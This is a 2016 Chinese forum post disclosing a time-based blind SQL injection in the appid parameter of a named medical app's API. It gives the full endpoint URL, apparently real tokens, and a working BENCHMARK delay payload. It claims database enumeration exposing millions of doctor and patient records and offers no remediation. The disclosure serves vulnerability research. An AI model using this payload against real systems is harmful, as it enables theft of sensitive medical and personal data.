HanDs
NO.2

[7月漏洞公开] 医疗企业安全之医脉通app一处SQL注入(涉及316W+医生/168W+患者信息) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

APP安全之SQL注入

详细说明:

目标:医脉通IOS APP

检测发现以下地方存在SQL注入:(注入参数appid,时间盲注)

code 区域
http://api.medlive.cn/user/get_push_info.php?apns_token=a1d0a3407e068cee108b0072e8dcdab36bf7e05ce542a3fbf7b3794b3bfe3da5&appid=com.kingyee.medlive.iphone&device_type=apple&device_version=9.3.2&medlive_user_id=2561346&token=689238C8-AD5C-40AD-9FA5-4512800145C6&version=3.2.1



Payload:(延时5秒)

code 区域
http://api.medlive.cn:80/user/get_push_info.php?apns_token=a1d0a3407e068cee108b0072e8dcdab36bf7e05ce542a3fbf7b3794b3bfe3da5&appid=com.kingyee.medlive.iphone" AND 1=(IF((8999=8999),BENCHMARK(5000000,MD5(111)),8999)) AND "rkvy"="rkvy&device_type=apple&device_version=9.3.2&medlive_user_id=2561346&token=689238C8-AD5C-40AD-9FA5-4512800145C6&version=3.2.1

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库,当前库为p2pdb

dbs.jpg



3、数据表,涉及316W+医生/168W+患者信息

tb2.jpg



tb1.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
医疗 企业 安全 a pp
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组